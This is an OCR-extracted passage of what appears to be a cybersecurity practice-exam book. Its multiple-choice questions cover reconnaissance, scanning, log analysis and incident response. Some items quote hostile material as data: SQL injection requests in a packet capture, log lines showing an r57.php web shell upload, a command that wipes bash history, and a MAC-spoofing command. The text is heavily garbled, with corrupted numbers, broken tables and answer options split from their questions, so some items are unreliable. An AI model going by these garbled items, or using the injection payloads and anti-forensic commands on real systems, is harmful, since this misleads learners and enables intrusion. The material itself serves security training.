from the same source IP. What should Janet report has occurred? 


[ 21/Jul/2017:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php"” "-" 302 
336 0 
[| 21/Jul/2017:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 


530-0 


108. 


|. 217 dul 2017202: 18:37 =0500 | 


336 0 


[ 21/Jul/2017:02:18:38 -0500] 


302 336 0 


[ 21/Jul/2017:02:18:40 -0500] 


336 © 


[ 21/Jul/2017:02:18:42 -0500] 


336 0 


A. 
B. 
C. 
D. 


A denial-of-service attack 


A vulnerability scan 


A port scan 
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A directory traversal attack 


10.011 


10.0.11 


10.0.11 


10.0.11 


"GET /scripts/manage.php" "-" 302 
"GET /scripts/download.php" "-" 
"GET /scripts/update.php" "-" 302 


"GET /scripts/new.php" "-" 302 


Charles received a pcap file from a system administrator at a remote site who was con- 
cerned about the traffic it showed. What type of behavior should Charles report after his 
analysis of the file? 
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Time 

1 0.000000 

2 @.100476 

3 @.201152 

4 @.301714 

5 0.403133 

6 0.503604 

7 @.607512 

8 @.707986 

9 0.808340 

10 0.904949 
11 1.004235 
12 1.110883 
13 1.212836 
1.307771 

15 1.407052 
16 1.512738 
17 1.614648 
18 1.708617 
19 1.807145 
20 1.905446 
21 2.017408 
22 2.120446 
23 2.212668 
24 2.311912 
25 2.418421 
26 2.520387 
27 2.616615 
28 2.716744 
29 2.819590 


Source 

10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 
10.100.25.14 


A DOS attack 
Port scanning 


A DDoS attack 


Service access issues 


Destination 

10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 
10.100.18.12 


Protocol 


TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 





Length Info 
60 1065 > 139 [SYN] Seq=@ Win=8 Len=@ 
60 19491 + 135 [SYN] Seq=@ Win=8 Len=0 
60 7358 > 445 [SYN] Seq=@ Win=8 Len=0 
60 27524 + 8@ [SYN] Seq=@ Win=8 Len=0 
60 20193 + 22 [SYN] Seq=@ Win=8 Len=@ 
60 1023 > 515 [SYN] Seq=@ Win=8 Len=0 
60 16748 + 23 [SYN] Seq=@ Win=8 Len=0 
60 12502 + 21 [SYN] Seq=@ Win=8 Len=0 
60 30382 + 6000 [SYN] Seq=@ Win=8 Len=0 
6@ 27986 + 1025 [SYN] Seq=@ Win=8 Len=@ 
60 25488 + 25 [SYN] Seq=@ Win=8 Len=@ 


60 6729 > 111 [SYN] Seq=@ Win=8 Len=@ 
60 29169 + 1028 [SYN] Seq=@ Win=8 Len=0 
60 24305 + 9100 [SYN] Seq=@ Win=8 Len=0 


6@ 17851 + 1029 [SYN] Seq=@ Win=8 Len=@ 
6@ 10985 + 79 [SYN] Seq=@ Win=8 Len=@ 
6@ 1515 + 497 [SYN] Seq=@ Win=8 Len=@ 
60 4019 + 548 [SYN] Seq=@ Win=8 Len=0 
60 12966 + 5000 [SYN] Seq=@ Win=8 Len=0 
6@ 5851 > 1917 [SYN] Seq=@ Win=8 Len=@ 
60 53 + 53 [SYN] Seq=@ Win=8 Len=0 

60 6460 > 161 [SYN] Seq=@ Win=8 Len=0 
60 33415 + 9001 [SYN] Seq=@ Win=8 Len=@ 
60 20 + 65535 [SYN] Seq=@ Win=8 Len=0 
60 15628 + 443 [SYN] Seq=@ Win=8 Len=@ 
60 25 + 113 [SYN] Seq=@ Win=8 Len=@ 

60 4926 + 993 [SYN] Seq=@ Win=8 Len=0 
60 1177 + 8080 [SYN] Seq=@ Win=8 Len=@ 
60 1316 + 2869 [SYN] Seq=@ Win=8 Len=@ 
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109. Susan is reviewing files on a Windows workstation and believes that cmd.exe has been 


110. 


111. 


replaced with a malware package. Which of the following is the best way to validate her 
theory? 


A. Submit cmd.exe to VirusTotal. 

B. Compare the hash of cmd.exe to a known good version. 

C. Check the file using the National Software Reference Library. 

D. Run cmd.exe to make sure its behavior is normal. 

What U.S. government program seeks to provide trusted sources that meet the following 
requirements? 

= Provide a chain of custody for classified and unclassified integrated circuits 

= Ensure that there will not be any reasonable threats related to supply disruption 


= Prevent intentional or unintentional modification or tampering of integrated circuits 


Protect integrated circuits from reverse engineering and vulnerability testing 


Trusted Foundry 
Chain of Custody 
Trusted Suppliers 
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Trusted Access Program 


While reviewing netflows for a system on her network, Alice discovers the following 
traffic pattern. What is occurring? 


Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows 
2017-07-11 04:59:32.934 0.000 TCP 10.1.1.1:34543->10.2.2.6:22 1 60 1 
2017-07-11 04:59:39.730 0.000 TCP 10.1.1.1:34544->10.2.2.7:22 1 60 1 
2017-07-11 04:59:46.166 0.000 TCP 10.1.1.1:34545->10.2.2.8:22 1 60 1 
2017-07-11 04:59:52.934 0.000 TCP 10.1.1.1:34546->10.2.2.9:22 1 60 1 
2017-07-11 05:00:06.710 0.000 TCP 10.1.1.1:34547->10.2.2.10:22 1 60 1 
2017-07-11 05:00:46.160 0.000 TCP 10.1.1.1:34548->10.2.2.11:22 1 60 1 
2017-07-11 05:01:32.834 0.000 TCP 10.1.1.1:34549->10.2.2.12:22 1 60 1 
2017-07-11 05:01:39.430 0.000 TCP 10.1.1.1:34550->10.2.2.13:22 1 60 1 
2017-07-11 05:01:46.676 0.000 TCP 10.1.1.1:34551->10.2.2.14:22 1 60 1 
A. telnet scan 

B. ssh scan 

C. ssh scan with unsuccessful connection attempts 

D. sftp scan with unsuccessful connection attempts 
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112. Chris wants to gather as much information as he can about an organization using DNS 


113. 


114. 


harvesting techniques. Which of the following methods will most easily provide the most 
useful information if they are all possible to conduct on the network he is targeting? 


A. DNS record enumeration 

B. Zone transfer 

C. Reverse lookup 

D. Domain brute forcing 

The national insurance company that Luke works for has experienced a breach, and Luke 
is attempting to categorize the impact. As he reviews the incident report, he notes that cus- 


tomer data that included Social Security numbers was exfiltrated from the organization. 
How should he categorize the impact? 


A. Asa regulated information breach 

B. Asan intellectual property breach 

C. Asaconfidential information breach 

D. Asan integrity loss 

As part of his reconnaissance effort, Chris enters usernames from public information 


about a company into a site like checkusernames.com and receives information like the 
results shown here. What type of action is he performing? 


® 
Wieck 


Check the use of your brand or username on 160 Social Networks: 


correctbatteryhorsestaple | Check User Name | 





w Wikipedia Available PH Tiny URL Available 








© Jimdo Available 
[0] Ning Available 








E Type Pad Available 





G Blogger Available 























Ø Imgur Available © Issuu Available 

ee Flickr Available 

® Word Press Available s9 Steam Available 
Live Leak Available 

4, Daily Motion Available a 





Social engineering 
Brute-force username guessing 


Social media profiling 
Phishing 
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115. 


116. 


117. 


118. 


119. 
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Geoff wants to perform passive reconnaissance as part of an evaluation of his organiza- 
tion’s security controls. Which of the following techniques is a valid technique to perform 
as part of a passive DNS assessment? 


A. A DNS forward or reverse lookup 

B. A zone transfer 

C. A WHOIS query 

D. Using maltego 

Mike’s penetration test requires him to use passive mapping techniques to discover net- 
work topology. Which of the following tools is best suited to that task? 

A. Wireshark 

B. nmap 

C. netcat 

D. Angry IP Scanner 

Geoff has been asked to identify a technical solution that will reduce the risk of captured 


or stolen passwords being used to allow access to his organization’s systems. Which of the 
following technologies should he recommend? 


A. Captive portals 

B. Multifactor authentication 
C. VPNs 

D. OAuth 


While gathering DNS information about an organization, Chris discovered multiple 
AAAA records. What type of reconnaissance does this mean Chris may want to consider? 


A. Second-level DNS queries 

B. IPv6 scans 

C. Cross-domain resolution 

D. A CNAME verification 

Sharon wants to gather email addresses as part of her reconnaissance efforts. Which of the 
following tools best suits her needs? 

A. nmap 

B. cree.py 

C. MailSnarf 

D. TheHarvester 
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120. After Charles completes a topology discovery scan of his local network, he sees the 
Zenmap topology shown here. What can Charles determine from the Zenmap topology 
view? 


router.demo.com (192.168.1.1) 


ESR Demohost2 (192.168.1.17) 


DemoHost3 (192.168.1\55) 


DemoPrinter (192.168.1.9) 
@kali (192.168.1.109) 


at 
` 
R 
- 






Wocalhost 


¥]DemoHost4 (192.168.1.22 


DemoHost4 (192.168.1.79) 


¥|192.168.1.215 





AZdemo (192.168.1.127) 





fældynamo (192.168.1 = 


STDemo (192.168.1.254) 


There are five hosts with port security enabled. 
DemoHost2 is running a firewall. 


DemoHost4 is running a firewall. 
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There are four hosts with vulnerabilities and seven hosts that do not have 
vulnerabilities. 


121. Which of the following items is not one of the three important rules that should be 
established before a penetration test? 


A. Timing 

B. Reporting 

C. Scope 

D. Authorization 
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122. 


No. 


123. 


124. 


125. 
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Scott is part of the white team who is overseeing his organization’s internal red and blue 
teams during an exercise that requires each team to only perform actions appropriate to 
the penetration test phase they are in. During the reconnaissance phase, he notes the fol- 
lowing behavior as part of a Wireshark capture. What should he report? 


Time Source Destination Protoc~ Lengtt Info 
2180 2.493035366 10.0.2.4 10.0.2.15 TCP 66 80 — 55554 [FIN, ACK] Seq=507 Ack=420 win=6880 Len=0 TSval=127193 TSecr=317472 
2181 2.493271630 10.0.2.15 10.0.2.4 TCP 66 55554 — 80 [FIN, ACK] Seq=420 Ack=508 Win=30336 Len=0 TSval=317472 TSecr=127193 
2182 2.493462055 10.0.2.4 10.0.2.15 TCP 66 80 — 55554 [ACK] Seq=508 Ack=421 wWin=6880 Len=0 TSval=127193 TSecr=317472 
2183 2.496331161 10.0.2.15 10.0.2.4 TCP 66 55552 — 80 [FIN, ACK] Seq=413 Ack=503 Win=30336 Len=0 TSval=317473 TSecr=127192 
2184 2.496386675 10.0.2.15 10.0.2.4 TCP 74 55556 — 80 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=317473 TSecr=0 wS=128 
2185 2.496500116 10.0.2.4 10.0.2.15 TCP 66 80 — 55552 [ACK] Seq=503 Ack=414 Win=6880 Len=0 TSval=127193 TSecr=317473 
2186 2.496520426 10.0.2.4 10.0.2.15 TCP 74 80 — 55556 [SYN, ACK] Seq=0 Ack=1 Win=5792 Len=0 MSS=1460 SACK_PERM=1 TSval=127193 TSecr=317 
2187 2.496527886 10.0.2.15 10.0.2.4 TCP 66 55556 — 80 [ACK] Seq=1 Ack=1 Win=29312 Len=0 TSval=317473 TSecr=127193 
2188 2.497238098  10.0.2.15 10.0.2.4 HTTP 492 GET /twiki/%20UNION%20ALL%20SELECT%2ONULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1 
2189 2.497404022 10.0.2.4 10.0.2.15 TCP 66 80 — 55556 [ACK] Seq=1 Ack=427 win=6880 Len=0 TSval=127193 TSecr=317473 
2190 2.497648036 10.0.2.4 10.0.2.15 HTTP 577 HTTP/1.1 404 Not Found (text/html) 
2191 2.497665375 10.0.2.15 10.0.2.4 TCP 66 55556 — 80 [ACK] Seq=427 Ack=512 Win=30336 Len=0 TSval=317473 TSecr=127194 
2192 2.497680491 10.0.2.4 10.0.2.15 TCP 66 80 — 55556 [FIN, ACK] Seq=512 Ack=427 Wwin=6880 Len=0 TSval=127194 TSecr=317473 
2193 2.502043782 10.0.2.15 10.0.2.4 TCP 74 55558 — 80 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=317474 TSecr=0 WS=128 
2194 2.502267987 10.0.2.4 10.0.2.15 TCP 74 80 — 55558 [SYN, ACK] Seq=0 Ack=1 Win=5792 Len=0 MSS=1460 SACK_PERM=1 TSval=127194 TSecr=317 
2195 2.502294637 10.0.2.15 10.0.2.4 TCP 66 55558 — 80 [ACK] Seq=1 Ack=1 Win=29312 Len=0 TSval=317474 TSecr=127194 
2196 2.502356539 10.0.2.15 10.0.2.4 HTTP 499 GET /twiki/%20UNION%20ALL%20SELECT%2ONULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1 


A. The blue team has succeeded. 

B. The red team is violating the rules of engagement. 

C. The red team has succeeded. 

D. The blue team is violating the rules of engagement. 

Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. 


She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 
636 and 443. What services is that system most likely running? 


A. LDAPS and HTTPS 

B. FIPS and HTTPS 

C. RDP and HTTPS 

D. HTTP and Secure DNS 


Lauren inputs the following command on a Linux system: 


#echo 127.0.0.1 example.com >> /etc/hosts 


What has she done? 

A. She has added the system to the allowed hosts file. 

B. She has routed traffic for the example.com domain to the local host. 

C. She has routed local host traffic to example.com. 

D. She has overwritten the hosts file and will have deleted all data except this entry. 


While reviewing Apache logs, Cynthia notices the following log entries. What has 
occurred? 


10.0.1.1 - POST /wordpress/wp-content/r57.php?1 200 
10.0.1.1 - GET /wordpress/wp-content/r57.php 200 


A. A file was downloaded and verified. 


A file was emailed. 


A file was moved to the wp-content directory. 


D OW 


A file was uploaded and verified. 


126. 


127. 


128. 


129. 
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Rhonda has identified a privilege escalation flaw on the system she targeted in the first 
phase of her penetration test and is now ready to take the next step. According to the 
NIST 800-115 standard, what is step C that Rhonda needs to take, as shown in this 
diagram? 


Escalating Install 
Privileges Additional Tools 


Gaining Access 





A. System browsing 
B. Scanning 

C. Rooting 

D. Consolidation 


While conducting a penetration test, Ben executes the following command: 
ifconfig ethO hw ether 08:00:27:06:d4 


What network protection is Ben most likely attempting to avoid? 


A. Port security 


B. NAC 
C. A firewall 
D. An IPS 


When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing? 
A. How fast the scan runs 

B. The TCP timeout flag it will set 

C. How many retries it will perform 

D. How long the scan will take to start up 


While conducting a port scan of a remote system, Henry discovers TCP port 1433 open. 
What service can he typically expect to run on this port? 


A. Oracle 

B. VNC 

C. IRC 

D. Microsoft SQL 
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133. 


134. 


Chapter 1 = Domain 1: Threat Management 


Every year, Alice downloads and reads a security industry published list of all the types 
of attacks, compromises, and malware events that have occurred, that are becoming more 
prevalent, and that are decreasing in occurrence. What type of analysis can she perform 
using this information? 


A. Anomaly 
B. Trend 

C. Heuristic 
D. Availability 


While application vulnerability scanning one of her target organizations web servers, 
Andrea notices that the server’s hostname is resolving to a cloudflare.com host. What 
does Andrea know about her scan? 


A. It is being treated like a DDoS attack. 

B. It is scanning a CDN-hosted copy of the site. 

C. It will not return useful information. 

D. She cannot determine anything about the site based on this information. 

While conducting active reconnaissance, Lauren discovers a web remote management 


application that appears to allow Windows command-line access on a server. What 
command can she run to quickly determine what user the service is running as? 


A. username 

B. showuser 

C. whoami 

D. cd c:\Users\%currentuser 

While tracking a potential APT on her network, Cynthia discovers a network flow for her 


company’s central file server. What does this flow entry most likely show if 10.2.2.3 is not 
a system on her network? 


Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows 
2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1G 1 
2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1 


A. A web browsing session 

B. Data exfiltration 

C. Data infiltration 

D. A vulnerability scan 

Chris wants to prevent users from running a popular game on Windows workstations he is 
responsible for. How can Chris accomplish this for Windows 10 Pro workstations? 

A. Using application whitelisting to prevent all unallowed programs from running 

B. Using Windows Defender and adding the game to the blacklist file 

C. By listing it in the Blocked Programs list via secpol.msc 

D. You cannot blacklist applications in Windows 10 without a third-party application. 


135. 


136. 


137. 


138. 


139. 
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After a series of compromised accounts led to her domain being blacklisted, Lauren has 
been asked to restore her company’s email as quickly as possible. Which of the following 
options is not a valid way to allow her company to send email successfully? 


A. Migrate her company’s SMTP servers to new IP addresses. 

B. Migrate to a cloud email hosting provider. 

C. Change SMTP headers to prevent blacklisting. 

D. Work with the blacklisting organizations to get removed from the list. 

Part of Tracy’s penetration testing assignment is to evaluate the WPA2 Enterprise pro- 


tected wireless networks of her target organization. What major differences exist between 
reconnaissance of a wired network versus a wireless network? 


A. Encryption and physical accessibility 

B. Network access control and encryption 

C. Port security and physical accessibility 

D. Authentication and encryption 

Ian’s company has an internal policy requiring that they perform regular port scans of all 
of their servers. Ian has been part of a recent effort to move his organization’s servers to an 


infrastructure as a service provider. What change will Ian most likely need to make to his 
scanning efforts? 


A. Change scanning software. 

B. Follow the service provider’s scan policies. 

C. Signa security contract with the provider. 

D. Discontinue port scanning. 

During a regularly scheduled PCI compliance scan, Fred has discovered port 3389 open on 


one of the point-of-sale terminals that he is responsible for managing. What service should 
he expect to find enabled on the system? 


A. MySQL 
B. RDP 

C. TOR 

D. Jabber 


Cynthia knows that the organization she is scanning runs services on alternate ports to 
attempt to reduce scans of default ports. As part of her intelligence-gathering process, she 
discovers services running on ports 8080 and 8443. What services are most likely running 
on these ports? 


A. Botnet C&C 

B. Nginx 

C. Microsoft SQL Server instances 
D 


Web servers 
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143. 


Chapter 1 = Domain 1: Threat Management 


Lauren wants to identify all the printers on the subnets she is scanning with nmap. Which 
of the following nmap commands will not provide her with a list of likely printers? 


A. nmap -sS -p 9100,515,631 10.0.10.15/22 -oX printers.txt 

B. nmap -O 10.0.10.15/22 -oG - | grep printer >> printers.txt 
C. nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt 

D. nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt 


Chris knows that systems have connected to a remote host on TCP ports 1433 and 1434. If 
he has no other data, what should his best guess be about what the host is? 


A. A print server 
B. A Microsoft SQL server 
C. A MySQL server 


D. A secure web server running on an alternate port 


What services will the following nmap scan test for? 
nmap -sV -p 22,25,53,389 192.168.2.50/27 


A. telnet, SMTP, DHCP, MS-SQL 
B. ssh, SMTP, DNS, LDAP 

C. telnet, SNMP, DNS, LDAP 

D. ssh, SNMP, DNS, RDP 


While investigating a compromise, Glenn encounters evidence that a user account has been 
added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and 
sees the following output. What has occurred? 


> root: $6$XHxtN5iBS5WOyg3egGfzr9QHPLo. 7ZOXIQIZEW6Q3/ 
K711pxG7ue04Cme Lkj C51SndpOcQLxTHmw4 /AKKsKew4f3cb/.BK8/:16828:0:99999:7::: 


> daemon: *:16820:0:99999:7::: 
bin: *:16820:0:99999:7::: 
Syst" 116820:0:99999:7:i1:; 
sync: *3:16820:0:99999:7::: 
games: *:16820:0:99999:7::: 
man? *:16820:0:99999:7::: 
os "21682080 7999990%7233 
mail:*:16820:0:99999:7::: 
news: *:16820:0:99999:7::: 
uucp: *;16820:0:99999:7::: 
proxy: *:16820:0:99999:7::: 
www-data: *:16820:0:99999:7::: 
backup: *:16820:0:99999:7::: 
List:*:16820:0:99999:7::: 
WCE $16820 50299999; 72 <3 
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The root account has been compromised. 
An account named daemon has been added. 


The shadow password file has been modified. 


909 D7 > 


/etc/shadow and /etc/passwd cannot be diffed to create a useful comparison. 


144. While conducting a topology scan of a remote web server, Susan notes that the IP 
addresses returned for the same DNS entry change over time. What has she likely 
encountered? 


A. A route change 
B. Fast flux DNS 
C. A load balancer 
D. An IP mismatch 


145. Attackers have been attempting to log into Alaina’s Cisco routers, causing thousands of log 
entries, and she is worried they may eventually succeed. Which of the following options 
should she recommend to resolve this issue? 


A. Prevent console login via ssh. 
B. Implement a login-block feature with back-off settings. 
C. Move the administrative interface to a protected network. 
D. Disable console access entirely. 
146. Ron is reviewing his team’s work as part of a reconnaissance effort and is checking 


Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue 
should he identify with their scan based on the capture shown here? 


Time | Destination Protoc~ Lengtt Info 


0.100180953 
0.110753561 
0.110817229 
0.110841441 
0.110863163 
0.111006998 
0.111027206 
0.111030525 
0.111101199 
0.111118867 
0.111121941 
0.111185718 
0.111202390 
0.111205511 
0.111268448 
0.111286492 
0.111349409 
0.111365580 
0.111428929 
0.111446417 
0.111508808 
0.111524824 
0.120479136 
0.120534842 
0.120547451 
0.120550476 
0.120553316 
0.120650965 
0.120668622 
0.120671933 
0.120674771 
0.120754540 
6 .120761057 
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26900 Len=0 
433 Len=0 
187 Len=0 
2241 Len=0 
419 Len=0 
17 Len=0 
10 Len=0 
1542 Len=0 
1349 Len=0 
4008 Len=0 
1472 Len=0 
163 Len=0 
33 Len=0 
557 Len=0 
198 Len=0 
1358 Len=0 
5714 Len=0 
920 Len=0 
677 Len=0 
446 Len=0 
68 Len=0 


44 


147. 


148. 


149. 


150. 


Oo wo > 


D. 


Chapter 1 = Domain 1: Threat Management 


The host was not up. 
Not all ports were scanned. 
The scan scanned only UDP ports. 


The scan was not run as root. 


John needs to protect his organization’s authentication system against brute-force attacks. 
Which of the following control pairs are best suited to preventing a brute-force attack 
from succeeding if ease of use and maintenance is also important? 


A. 
B. 
C. 
D. 


Passwords and PINs 
Passwords and biometrics 
Passwords and token-based authentication 


Token-based authentication and biometrics 


While reviewing the command history for an administrative user, Chris discovers a 
suspicious command that was captured, shown here: 


ln /dev/null ~/.bash_history 


What action was this user attempting to perform? 


A. 
B. 
C. 
D. 


Enabling the bash history 
Appending the contents of /dev/null to the bash history 
Logging all shell commands to /dev/null 


Allowing remote access from the null shell 


While attempting to stop a rogue service, Monica issues the following Linux command on 
an Ubuntu system using upstart: 


service rogueservice stop 


After a reboot, she discovers the service running again. What happened, and what does 
she need to do to prevent this? 


A. 
B. 
C. 


D. 


The service restarted at reboot; she needs to include the "-p", or permanent flag. 
The service restarted itself; she needs to delete the binary associated with the service. 


The service restarted at reboot; she should add an .override file to stop the service 
from starting. 


A malicious user restarted the service; she needs to ensure users cannot restart 
services. 


Lucca wants to validate DNS responses to ensure that they are from authoritative DNS 
servers. What technology can he use to do this? 


A. 
B. 


DNSSEC 
DNSCrypt 


151. 


152. 


153. 


154. 


155. 
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C. DNShield 

D. DNS is an open protocol and does not support secure validation. 

Nathan has been asked to monitor and manage the environment in which a cybersecurity 
exercise is conducted. What team is he on? 

A. Red team 

B. White team 

C. Blue team 

D. Black team 


Allan’s nmap scan includes a line that starts with cpe: /o. What type of information should 
he expect to gather from the entry? 


A. Common privilege escalation 

B. Operating system 

C. Certificate performance evaluation 

D. Hardware identification 

Which of the following items is not typically included in the rules of engagement for a pen- 
etration test? 

A. Timing 

B. Authorization 

C. Scope 

D. Authorized tools 

Isaac wants to prevent hosts from connecting to known malware distribution domains. 


What type of solution can he use to do this without deploying endpoint protection 
software or an IPS? 


A. Route poisoning 

B. Anti-malware router filters 

C. Subdomain whitelisting 

D. DNS blackholing 

While scanning a network, Frank discovers a host running a service on TCP ports 1812 
and 1813. What type of server has Frank most likely discovered? 

A. RADIUS 

B. VNC 
C. Kerberos 
D 


Postgres 
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156. While reviewing output from netstat, John sees the following output. What should his 


157. 


158. 


159. 


160. 


next action be? 


[minesweeper.exe | 


TCP 127,40 .054562522 dynamo: 0 LISTENING 
[minesweeper .exe] 
TCP 192.168. 1,.100 151.101.2:69: https ESTABLISHED 


Capture traffic to 151.101.2.69 using Wireshark. 
Initiate the organization’s incident response plan. 
Check to see whether 151.101.2.69 is a valid Microsoft address. 


Ignore it, because this is a false positive. 


99 9 > 


Shane wants to conduct an nmap scan of a firewalled subnet. Which of the following is not 
an nmap firewall evasion technique he could use? 


A. Fragmenting packets 

B. Changing packet header flags 

C. Spoofing the source IP 

D. Appending random data 

Alex is observing a penetration tester who has gained access to a Windows domain con- 


troller. The penetration tester runs a program called fgdump and gathers information from 
the system. What type of information has the penetration tester targeted? 


A. File and group information 

B. Password and usernames 

C. Active Directory full GPO lists 

D. Nothing, because FGDump is a Linux tool. 


Which of the following commands will provide Ben with the most information about a host? 
A. dig -x [ip address] 

B. host [ip address] 

C. nslookup [ip address] 

D. zonet [ip address] 

Selah suspects that the Linux system she has just logged into may be Trojaned and wants 


to check where the bash shell she is running is being executed from. What command 
should she run to determine this? 


A. where bash 
B. ls -l bash 
C. which bash 
D. printenv bash 
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161. Adam needs to provide ssh access to systems behind his data center firewall. If Adam’s 
organization uses the system architecture shown here, what is the system at point A called? 





Firewall or 
Unified 
Security 
Deivce 


Es 







= 





Data Center 
Servers \ 


E 


=p. 
=p. 
-E a 


A firewall-hopper 


An isolated system 
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A moat-protected host 
D. A jump box 
162. Angela wants to block traffic sent to a suspected malicious host. What iptables rule 
entry can she use to block traffic to a host with IP address 10.24.31.11? 
A. iptables -A OUTPUT -d 10.24.31.11 -j DROP 
B. iptables -A INPUT -d 10.24.31.11 -j ADD 
C. iptables -block -host 10.24.31.11 -j DROP 
D. iptables -block -ip 10.24.31.11 -j ADD 


163. Fred’s reconnaissance of an organization includes a search of the Censys network search 
engine. There, he discovers multiple certificates with validity dates as shown here: 


Validity 

2016-07-07 00:00:00to 2017-08-11 23:59:59 (400 days, 23:59:59) 
2016-07-08 00:00:00to 2017-08-12 23:59:59 (400 days, 23:59:59) 
2017-07-11 00:00:00to 2018-08-15 23:59:59 (400 days, 23:59:59) 


What should Fred record in his reconnaissance notes? 

A. The certificates expired as expected, showing proper business practice. 
B. The certificates were expired by the CA, possibly due to nonpayment. 
C. The system that hosts the certificates may have been compromised. 
D. 


The CA may have been compromised, leading to certificate expiration. 
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164. After receiving a penetration test report, Rick has decided to implement anti-harvesting 
techniques for his organization’s DNS. Which of the following sets of techniques is best 
suited to preventing bulk and automated information gathering? 


165. 


166. 


167. 


168. 


A. 
B. 
C. 
D. 


CAPTCHA and proxy services 

Rate limiting and CAPTCHA 

Not publishing TLD zone files and blacklisting 
CAPTCHA and blacklisting 


When Casey scanned a network host, she received the results shown here. What does she 
know based on the scan results? 
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PORT STATE SERVICE VERSION 
2000/tcp open cisco-sccp? 
3000/tcp open http Apache httpd 2.2.3 ((Cent0S)) 


6789/tcp open ibm-db2-admin? 


The device is a Cisco device. 
The device is running CentOS. 
The device was built by IBM. 


None of the above 


What is a document that lists sensitive data-handling rules, contact information, black-box 
testing, and status meeting schedules called during a penetration test? 


A. 
B. 
C. 
D. 


The “get out of jail free” card 
The rules of engagement 
Executive sign-off 


A penetration test standard 


Fred conducts an SNMP sweep of a target organization and receives no-response replies 
from multiple addresses that he believes belong to active hosts. What does this mean? 


A. 
B. 
C. 
D. 


The machines are unreachable. 
The machines are not running SNMP servers. 
The community string he used is invalid. 


Any or all of the above may be true. 


Angela wants to gather detailed information about the hosts on a network passively. If she 
has access to a Wireshark pcap file from the network, which of the following tools can she 
use to provide automated analysis of the file? 


A. 


B. 
C. 
D 


ettercap 
Network Miner 
Sharkbait 
dradis 


www.allitebooks.com 
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169. Rick’s security research company wants to gather data about current attacks and sets up a 


170. 


171. 


172. 


number of intentionally vulnerable systems that allow his team to log and analyze exploits 
and attack tools. What type of environment has Rick set up? 


A. A tarpit 

B. A honeypot 
C. A honeynet 
D. A blackhole 


While performing reconnaissance of an organization’s network, Angela discovers that 
web.organization.com, www.organization.com, and documents.organization.com 
all point to the same host. What type of DNS record allows this? 


A. ACNAME 

B. An MX record 
C. An SPF record 

D. An SOA record 


Susan wants to prevent attackers from running specific files and also wants to lock down 
other parts of the Windows operating system to limit the impact of attackers who have 
access to workstations she is responsible for. If she wants to do this on Windows 10 work- 
stations, what tool should she use? 

A. Secpol.msc 

B. FileVault 


C. AppLocker 


While reviewing the auth. log file on a Linux system she is responsible for, Tiffany discov- 
ers the following log entries: 


Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; 
logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root 


Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3 


Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 
port 38463 ssh2 


Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts 
exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth] 


Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication 
failures [preauth] 

Which of the following has not occurred? 

A. A user has attempted to re-authenticate too many times. 


B. PAM is configured for three retries and will reject any additional retries in the same 
session. 


C. Fail2ban has blocked the ssh login attempts. 


D. Root is attempting to log in via ssh from the local host. 
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173. Chris operates the point-of-sale network for a company that accepts credit cards and is 


174. 


175. 


176. 


thus required to be compliant with PCI-DSS. During his regular assessment of the point- 
of-sale terminals, he discovers that a recent Windows operating system vulnerability exists 
on all of them. Since they are all embedded systems that require a manufacturer update, he 
knows that he cannot install the available patch. What is Chris’s best option to stay com- 
pliant with PCI-DSS and protect his vulnerable systems? 


A. Replace the Windows embedded point-of-sale terminals with standard Windows 
systems. 


B. Build a custom operating system image that includes the patch. 

C. Identify, implement, and document compensating controls. 

D. Remove the POS terminals from the network until the vendor releases a patch. 
Senior management in Adam’s company recently read a number of articles about massive 
ransomware attacks that successfully targeted organizations like the one that Adam is a 
part of. Adam’s organization already uses layered security solutions including a border 
IPS, firewalls between network zones, local host firewalls, antivirus software, and a con- 
figuration management system that applies recommended operating system best practice 


settings to their workstations. What should Adam recommend to minimize the impact of a 
similar ransomware outbreak at his organization? 


A. Honeypots 

B. Backups 

